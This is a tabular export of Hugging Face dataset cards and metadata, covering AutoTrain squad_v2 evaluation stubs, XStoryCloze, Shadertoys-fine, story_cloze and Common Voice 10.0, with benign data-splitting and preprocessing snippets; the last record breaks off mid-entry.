sha | text | id | tags | created_at | metadata | last_modified |
---|---|---|---|---|---|---|
ae4442bb10bc1cd57779ad99594d94db75420667 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:44+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:44+00:00 |
91aaa4a325ad414cfcde8690892b7dedb5425530 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/extractive-question-answering
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:48+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/extractive-question-answering", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:19+00:00 |
c9fbf6541ad051a61f3bea8ea553af895ddb0449 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/distilbert-base-cased-distilled-squad
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/distilbert-base-cased-distilled-squad", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:25+00:00 |
b87c2d6f00929ca0f2f43e8d1a3532e4b0df069f | XStoryCloze consists of the professionally translated version of the [English StoryCloze dataset](https://cs.rochester.edu/nlp/rocstories/) (Spring 2016 version) to 10 other languages. This dataset is released by Meta AI.
# Languages
ru, zh (Simplified), es (Latin America), ar, hi, id, te, sw, eu, my.
# Data Splits
This dataset is intended to be used for evaluating the zero- and few-shot learning capabilities of multilingual language models. We split the data for each language into train and test (360 vs. 1510 examples, respectively). The released data files for different languages maintain a line-by-line alignment.
# Access English StoryCloze
Please request the original English StoryCloze dataset through the [official channel](https://cs.rochester.edu/nlp/rocstories/). You can create a split of the en data following our data split scheme using the following commands:
```
# first 361 lines = header + 360 training examples
head -361 spring2016.val.tsv > spring2016.val.en.tsv.split_20_80_train.tsv
# copy the header line into the eval file
head -1 spring2016.val.tsv > spring2016.val.en.tsv.split_20_80_eval.tsv
# append the remaining 1510 examples as the eval set
tail -1510 spring2016.val.tsv >> spring2016.val.en.tsv.split_20_80_eval.tsv
```
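For reference, a minimal Python equivalent of the shell split above (a sketch, not part of the official release; it assumes the file keeps its header row):
```python
# Line-based equivalent of the head/tail commands: the header line is kept
# in both output files, the first 360 examples become train and the
# remaining 1510 become eval.
with open("spring2016.val.tsv") as f:
    lines = f.readlines()

header, data = lines[0], lines[1:]

with open("spring2016.val.en.tsv.split_20_80_train.tsv", "w") as f:
    f.writelines([header] + data[:360])

with open("spring2016.val.en.tsv.split_20_80_eval.tsv", "w") as f:
    f.writelines([header] + data[360:])
```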
# Licence
XStoryCloze is open-sourced under [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/legalcode), the same license as the original English StoryCloze.
# Citation
If you use XStoryCloze in your work, please cite
```
@article{DBLP:journals/corr/abs-2112-10668,
author = {Xi Victoria Lin and
Todor Mihaylov and
Mikel Artetxe and
Tianlu Wang and
Shuohui Chen and
Daniel Simig and
Myle Ott and
Naman Goyal and
Shruti Bhosale and
Jingfei Du and
Ramakanth Pasunuru and
Sam Shleifer and
Punit Singh Koura and
Vishrav Chaudhary and
Brian O'Horo and
Jeff Wang and
Luke Zettlemoyer and
Zornitsa Kozareva and
Mona T. Diab and
Veselin Stoyanov and
Xian Li},
title = {Few-shot Learning with Multilingual Language Models},
journal = {CoRR},
volume = {abs/2112.10668},
year = {2021},
url = {https://arxiv.org/abs/2112.10668},
eprinttype = {arXiv},
eprint = {2112.10668},
timestamp = {Tue, 04 Jan 2022 15:59:27 +0100},
biburl = {https://dblp.org/rec/journals/corr/abs-2112-10668.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
```
| Muennighoff/xstory_cloze_data | [
"arxiv:2112.10668",
"region:us"
] | 2022-07-22T08:56:03+00:00 | {} | 2022-07-22T09:00:22+00:00 |
a16580eb510078482c7625c086cb75ca82c53007 |
# Dataset Card for Shadertoys-fine
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
Fine variant of the Shadertoys dataset (still WIP), where individual functions are available as data points.
### Supported Tasks and Leaderboards
`language-modeling`: The dataset can be used to train a model for modelling programming languages.
### Languages
- English (names, comments)
- Shadercode **programming** language
## Dataset Structure
### Data Instances
A data point consists of the function string and its name, as well as a bit of metadata like the author and source URL. (In the future there might be a function string without comments.)
```
{
'name': '<type> <name>',
'code': '<type> <name>(<inputs>) { <body> return <outputs>; }\n',
'source': 'https://shadertoy.com/view/<shaderID>',
'author': '<username>'
}
```
A data point in the `return_completion` subset for the return-completion task in [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderEval) includes just two features:
```
{
'body': '<type> <name>(<inputs>) { <body> return',
'return_statement': ' <outputs>; }\n',
}
```
### Data Fields
- 'name' function identifier composed of the type and the name of the function
- 'code' the raw code (including comments) of the function.
- 'source' URL to the shader. It might be on a different renderpass
- 'author' username of the shader author
- 'body' the body of the function without the return statement (no comments)
- 'return_statement' the return statement of the function. Everything in front of the semicolon is kept, and whitespace is stripped in the custom Evaluator.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
These splits should be indexed the same across both subsets, so if you are fine-tuning on the `fine` subset you won't get exposed to the `return_completion` test split. However, there are many duplicates among both subsets and splits.
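A minimal loading sketch for the subset consumed by ShaderEval (config names follow the `dataset_info` block in the metadata below):
```python
from datasets import load_dataset

# Load the return-completion subset and peek at one held-out example.
ds = load_dataset("Vipitis/Shadertoys-fine", "return_completion", split="test")
print(ds[0]["body"][-60:], "->", ds[0]["return_statement"])
```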
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2); functions were then extracted by looking for keywords and counting curly brackets to determine what is part of a function and what isn't.
#### Who are the source language producers?
Shadertoy.com contributors who publish their shaders as 'public+API'.
## Licensing Information
The default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some shaders might have a different license attached. The dataset currently does not filter for any licenses. | Vipitis/Shadertoys-fine | [
"task_categories:text-generation",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:100K<n<1M",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-22T09:45:36+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["text-generation"], "task_ids": [], "pretty_name": "Shadertoys-fine", "tags": ["code"], "dataset_info": [{"config_name": "default", "features": [{"name": "name", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "source", "dtype": "string"}, {"name": "author", "dtype": "string"}], "splits": [{"name": "train"}, {"name": "test"}], "download_size": 154529204, "dataset_size": 0}, {"config_name": "fine", "features": [{"name": "name", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "source", "dtype": "string"}, {"name": "author", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 119963236, "num_examples": 226910}, {"name": "test", "num_bytes": 20003783, "num_examples": 38356}], "download_size": 154529204, "dataset_size": 139967019}, {"config_name": "return_completion", "features": [{"name": "body", "dtype": "string"}, {"name": "return_statement", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 37597125, "num_examples": 84843}, {"name": "test", "num_bytes": 6360131, "num_examples": 14248}], "download_size": 154529204, "dataset_size": 43957256}]} | 2023-05-04T21:37:17+00:00 |
94f5828caf1fed6c4e59499abdfcd873a9c030a3 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T10:14:33+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T10:17:44+00:00 |
9c16af46e39ca7b77c67d091885bafd8cb05ee48 | Simpe Sentimental analysis Dataset checking with AUtoTrain Pipeline | ameerazam08/autotrain-data-imdb | [
"region:us"
] | 2022-07-22T10:43:35+00:00 | {} | 2022-08-08T03:19:44+00:00 |
8bb76e594b68147f1a430e86829d07189622b90d | # Dataset Card for "story_cloze"
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
### Dataset Summary
The 'Story Cloze Test' is a new commonsense reasoning framework for evaluating story understanding, story generation, and script learning. This test requires a system to choose the correct ending to a four-sentence story.
### Data Instances
- **Size of downloaded dataset files:** 2.03 MB
- **Size of the generated dataset:** 2.03 MB
- **Total amount of disk used:** 2.05 MB
An example of 'train' looks as follows.
```
{'answer_right_ending': 1,
'input_sentence_1': 'Rick grew up in a troubled household.',
'input_sentence_2': 'He never found good support in family, and turned to gangs.',
'input_sentence_3': "It wasn't long before Rick got shot in a robbery.",
'input_sentence_4': 'The incident caused him to turn a new leaf.',
'sentence_quiz1': 'He is happy now.',
'sentence_quiz2': 'He joined a gang.',
'story_id': '138d5bfb-05cc-41e3-bf2c-fa85ebad14e2'}
```
### Data Fields
The data fields are the same among all splits.
- `input_sentence_1`: The first statement in the story.
- `input_sentence_2`: The second statement in the story.
- `input_sentence_3`: The third statement in the story.
- `input_sentence_4`: The fourth statement in the story.
- `sentence_quiz1`: The first possible continuation of the story.
- `sentence_quiz2`: The second possible continuation of the story.
- `answer_right_ending`: The correct ending; either 1 or 2.
- `story_id`: story id.
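Using the fields above, a minimal sketch for reconstructing the full gold story from one example (the helper name is ours, not part of the dataset):
```python
def gold_story(example):
    """Join the four context sentences with the annotated correct ending."""
    context = " ".join(example[f"input_sentence_{i}"] for i in range(1, 5))
    ending = (example["sentence_quiz1"]
              if example["answer_right_ending"] == 1
              else example["sentence_quiz2"])
    return f"{context} {ending}"
```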
### Data Splits
| name | validation | test |
|------|-----------:|-----:|
| lang | 1871 | 1871 |
| Muennighoff/xstory_cloze | [
"annotations_creators:found",
"language_creators:found",
"multilinguality:multilingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"language:es",
"language:eu",
"language:hi",
"language:id",
"language:zh",
"language:ru",
"language:my",
"license:unknown",
"other-story-completion",
"region:us"
] | 2022-07-22T10:52:19+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["ar", "es", "eu", "hi", "id", "zh", "ru", "my"], "license": ["unknown"], "multilinguality": ["multilingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_ids": [], "tags": ["other-story-completion"]} | 2022-10-20T18:44:18+00:00 |
de17e62a0b8f40bae1ff1bffd42916d46adc62a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nbroad/deberta-v3-xsmall-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T12:14:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nbroad/deberta-v3-xsmall-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T12:17:28+00:00 |
850e6e9d4e72b0b1bd5b8ecebdb169cc0afecc55 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: distilbert-base-cased-distilled-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T14:07:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "distilbert-base-cased-distilled-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:10:00+00:00 |
0a49812b2507cee6824dbd859214a6dc75c3a32f |
# Dataset Card for Common Voice Corpus 10.0
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://commonvoice.mozilla.org/en/datasets
- **Repository:** https://github.com/common-voice/common-voice
- **Paper:** https://arxiv.org/abs/1912.06670
- **Leaderboard:** https://paperswithcode.com/dataset/common-voice
- **Point of Contact:** [Anton Lozhkov](mailto:[email protected])
### Dataset Summary
The Common Voice dataset consists of a unique MP3 and corresponding text file.
Many of the 20817 recorded hours in the dataset also include demographic metadata like age, sex, and accent
that can help improve the accuracy of speech recognition engines.
The dataset currently consists of 15234 validated hours in 96 languages, but more voices and languages are always added.
Take a look at the [Languages](https://commonvoice.mozilla.org/en/languages) page to request a language or start contributing.
### Supported Tasks and Leaderboards
The results for models trained on the Common Voice datasets are available via the
[🤗 Speech Bench](https://huggingface.co/spaces/huggingface/hf-speech-bench)
### Languages
```
Abkhaz, Arabic, Armenian, Assamese, Asturian, Azerbaijani, Basaa, Bashkir, Basque, Belarusian, Bengali, Breton, Bulgarian, Cantonese, Catalan, Central Kurdish, Chinese (China), Chinese (Hong Kong), Chinese (Taiwan), Chuvash, Czech, Danish, Dhivehi, Dutch, English, Erzya, Esperanto, Estonian, Finnish, French, Frisian, Galician, Georgian, German, Greek, Guarani, Hakha Chin, Hausa, Hindi, Hungarian, Igbo, Indonesian, Interlingua, Irish, Italian, Japanese, Kabyle, Kazakh, Kinyarwanda, Kurmanji Kurdish, Kyrgyz, Latvian, Lithuanian, Luganda, Macedonian, Malayalam, Maltese, Marathi, Meadow Mari, Moksha, Mongolian, Nepali, Norwegian Nynorsk, Odia, Persian, Polish, Portuguese, Punjabi, Romanian, Romansh Sursilvan, Romansh Vallader, Russian, Sakha, Santali (Ol Chiki), Sardinian, Serbian, Slovak, Slovenian, Sorbian, Upper, Spanish, Swahili, Swedish, Taiwanese (Minnan), Tamil, Tatar, Thai, Tigre, Toki Pona, Turkish, Ukrainian, Urdu, Uyghur, Uzbek, Vietnamese, Votic, Welsh
```
## Dataset Structure
### Data Instances
A typical data point comprises the `path` to the audio file and its `sentence`.
Additional fields include `accent`, `age`, `client_id`, `up_votes`, `down_votes`, `gender`, `locale` and `segment`.
```python
{
'client_id': 'd59478fbc1ee646a28a3c652a119379939123784d99131b865a89f8b21c81f69276c48bd574b81267d9d1a77b83b43e6d475a6cfc79c232ddbca946ae9c7afc5',
'path': 'et/clips/common_voice_et_18318995.mp3',
'audio': {
'path': 'et/clips/common_voice_et_18318995.mp3',
'array': array([-0.00048828, -0.00018311, -0.00137329, ..., 0.00079346, 0.00091553, 0.00085449], dtype=float32),
'sampling_rate': 48000
},
'sentence': 'Tasub kokku saada inimestega, keda tunned juba ammust ajast saati.',
'up_votes': 2,
'down_votes': 0,
'age': 'twenties',
'gender': 'male',
'accent': '',
'locale': 'et',
'segment': ''
}
```
### Data Fields
`client_id` (`string`): An id for which client (voice) made the recording
`path` (`string`): The path to the audio file
`audio` (`dict`): A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]` (see the sketch after this list).
`sentence` (`string`): The sentence the user was prompted to speak
`up_votes` (`int64`): How many upvotes the audio file has received from reviewers
`down_votes` (`int64`): How many downvotes the audio file has received from reviewers
`age` (`string`): The age of the speaker (e.g. `teens`, `twenties`, `fifties`)
`gender` (`string`): The gender of the speaker
`accent` (`string`): Accent of the speaker
`locale` (`string`): The locale of the speaker
`segment` (`string`): Usually an empty field
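A short sketch of the access pattern recommended in the `audio` field description above (the `et` config is just an example):
```python
from datasets import load_dataset

ds = load_dataset("mozilla-foundation/common_voice_10_0", "et", split="train", use_auth_token=True)

# Query the sample index first, then the "audio" column, so only this one
# file is decoded and resampled rather than the whole dataset.
sample = ds[0]
waveform = sample["audio"]["array"]
sampling_rate = sample["audio"]["sampling_rate"]
```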
### Data Splits
The speech material has been subdivided into portions for dev, train, test, validated, invalidated, reported and other.
The validated data is data that has been validated with reviewers and received upvotes that the data is of high quality.
The invalidated data is data that has been invalidated by reviewers and received downvotes indicating that the data is of low quality.
The reported data is data that has been reported, for different reasons.
The other data is data that has not yet been reviewed.
The dev, test and train splits all contain data that has been reviewed and deemed of high quality.
## Data Preprocessing Recommended by Hugging Face
The following are data preprocessing steps advised by the Hugging Face team. They are accompanied by an example code snippet that shows how to put them into practice.
Many examples in this dataset have trailing quotation marks, e.g. _“the cat sat on the mat.”_. These trailing quotation marks do not change the actual meaning of the sentence, and it is near impossible to infer whether a sentence is a quotation or not from audio data alone. In these cases, it is advised to strip the quotation marks, leaving: _the cat sat on the mat_.
In addition, the majority of training sentences end in punctuation ( . or ? or ! ), whereas just a small proportion do not. In the dev set, **almost all** sentences end in punctuation. Thus, it is recommended to append a full-stop ( . ) to the end of the small number of training examples that do not end in punctuation.
```python
from datasets import load_dataset
ds = load_dataset("mozilla-foundation/common_voice_10_0", "en", use_auth_token=True)
def prepare_dataset(batch):
"""Function to preprocess the dataset with the .map method"""
transcription = batch["sentence"]
if transcription.startswith('"') and transcription.endswith('"'):
# we can remove trailing quotation marks as they do not affect the transcription
transcription = transcription[1:-1]
if transcription[-1] not in [".", "?", "!"]:
# append a full-stop to sentences that do not end in punctuation
transcription = transcription + "."
batch["sentence"] = transcription
return batch
ds = ds.map(prepare_dataset, desc="preprocess dataset")
```
## Dataset Creation
### Curation Rationale
[Needs More Information]
### Source Data
#### Initial Data Collection and Normalization
[Needs More Information]
#### Who are the source language producers?
[Needs More Information]
### Annotations
#### Annotation process
[Needs More Information]
#### Who are the annotators?
[Needs More Information]
### Personal and Sensitive Information
The dataset consists of people who have donated their voice online. You agree to not attempt to determine the identity of speakers in the Common Voice dataset.
## Considerations for Using the Data
### Social Impact of Dataset
The dataset consists of people who have donated their voice online. You agree to not attempt to determine the identity of speakers in the Common Voice dataset.
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
Public Domain, [CC-0](https://creativecommons.org/share-your-work/public-domain/cc0/)
### Citation Information
```
@inproceedings{commonvoice:2020,
author = {Ardila, R. and Branson, M. and Davis, K. and Henretty, M. and Kohler, M. and Meyer, J. and Morais, R. and Saunders, L. and Tyers, F. M. and Weber, G.},
title = {Common Voice: A Massively-Multilingual Speech Corpus},
booktitle = {Proceedings of the 12th Conference on Language Resources and Evaluation (LREC 2020)},
pages = {4211--4215},
year = 2020
}
```
| mozilla-foundation/common_voice_10_0 | [
"task_categories:automatic-speech-recognition",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"multilinguality:multilingual",
"source_datasets:extended|common_voice",
"license:cc0-1.0",
"arxiv:1912.06670",
"region:us"
] | 2022-07-22T14:10:26+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "license": ["cc0-1.0"], "multilinguality": ["multilingual"], "size_categories": {"ab": ["10K<n<100K"], "ar": ["100K<n<1M"], "as": ["1K<n<10K"], "ast": ["n<1K"], "az": ["n<1K"], "ba": ["100K<n<1M"], "bas": ["1K<n<10K"], "be": ["100K<n<1M"], "bg": ["1K<n<10K"], "bn": ["100K<n<1M"], "br": ["10K<n<100K"], "ca": ["1M<n<10M"], "ckb": ["100K<n<1M"], "cnh": ["1K<n<10K"], "cs": ["10K<n<100K"], "cv": ["10K<n<100K"], "cy": ["100K<n<1M"], "da": ["1K<n<10K"], "de": ["100K<n<1M"], "dv": ["10K<n<100K"], "el": ["10K<n<100K"], "en": ["1M<n<10M"], "eo": ["1M<n<10M"], "es": ["100K<n<1M"], "et": ["10K<n<100K"], "eu": ["100K<n<1M"], "fa": ["100K<n<1M"], "fi": ["10K<n<100K"], "fr": ["100K<n<1M"], "fy-NL": ["10K<n<100K"], "ga-IE": ["1K<n<10K"], "gl": ["10K<n<100K"], "gn": ["1K<n<10K"], "ha": ["1K<n<10K"], "hi": ["10K<n<100K"], "hsb": ["1K<n<10K"], "hu": ["10K<n<100K"], "hy-AM": ["1K<n<10K"], "ia": ["10K<n<100K"], "id": ["10K<n<100K"], "ig": ["1K<n<10K"], "it": ["100K<n<1M"], "ja": ["10K<n<100K"], "ka": ["1K<n<10K"], "kab": ["100K<n<1M"], "kk": ["1K<n<10K"], "kmr": ["10K<n<100K"], "ky": ["10K<n<100K"], "lg": ["100K<n<1M"], "lt": ["10K<n<100K"], "lv": ["1K<n<10K"], "mdf": ["n<1K"], "mhr": ["10K<n<100K"], "mk": ["n<1K"], "ml": ["1K<n<10K"], "mn": ["10K<n<100K"], "mr": ["10K<n<100K"], "mt": ["10K<n<100K"], "myv": ["1K<n<10K"], "nan-tw": ["10K<n<100K"], "ne-NP": ["n<1K"], "nl": ["10K<n<100K"], "nn-NO": ["n<1K"], "or": ["1K<n<10K"], "pa-IN": ["1K<n<10K"], "pl": ["100K<n<1M"], "pt": ["100K<n<1M"], "rm-sursilv": ["1K<n<10K"], "rm-vallader": ["1K<n<10K"], "ro": ["10K<n<100K"], "ru": ["100K<n<1M"], "rw": ["1M<n<10M"], "sah": ["1K<n<10K"], "sat": ["n<1K"], "sc": ["n<1K"], "sk": ["10K<n<100K"], "sl": ["10K<n<100K"], "sr": ["1K<n<10K"], "sv-SE": ["10K<n<100K"], "sw": ["100K<n<1M"], "ta": ["100K<n<1M"], "th": ["100K<n<1M"], "tig": ["n<1K"], "tok": ["1K<n<10K"], "tr": ["10K<n<100K"], "tt": ["10K<n<100K"], "ug": ["10K<n<100K"], "uk": ["10K<n<100K"], "ur": ["100K<n<1M"], "uz": ["100K<n<1M"], "vi": ["10K<n<100K"], "vot": ["n<1K"], "yue": ["10K<n<100K"], "zh-CN": ["100K<n<1M"], "zh-HK": ["100K<n<1M"], "zh-TW": ["100K<n<1M"]}, "source_datasets": ["extended|common_voice"], "task_categories": ["automatic-speech-recognition"], "paperswithcode_id": "common-voice", "pretty_name": "Common Voice Corpus 10.0", "language_bcp47": ["ab", "ar", "as", "ast", "az", "ba", "bas", "be", "bg", "bn", "br", "ca", "ckb", "cnh", "cs", "cv", "cy", "da", "de", "dv", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy-NL", "ga-IE", "gl", "gn", "ha", "hi", "hsb", "hu", "hy-AM", "ia", "id", "ig", "it", "ja", "ka", "kab", "kk", "kmr", "ky", "lg", "lt", "lv", "mdf", "mhr", "mk", "ml", "mn", "mr", "mt", "myv", "nan-tw", "ne-NP", "nl", "nn-NO", "or", "pa-IN", "pl", "pt", "rm-sursilv", "rm-vallader", "ro", "ru", "rw", "sah", "sat", "sc", "sk", "sl", "sr", "sv-SE", "sw", "ta", "th", "tig", "tok", "tr", "tt", "ug", "uk", "ur", "uz", "vi", "vot", "yue", "zh-CN", "zh-HK", "zh-TW"], "extra_gated_prompt": "By clicking on \u201cAccess repository\u201d below, you also agree to not attempt to determine the identity of speakers in the Common Voice dataset."} | 2023-07-29T15:00:14+00:00 |
bb5a0bf1924a55a85433166cacc8384fd7c099dc | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nbroad/xdistil-l12-h384-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554 | [
"autotrain",
"evaluation",
"region:us"
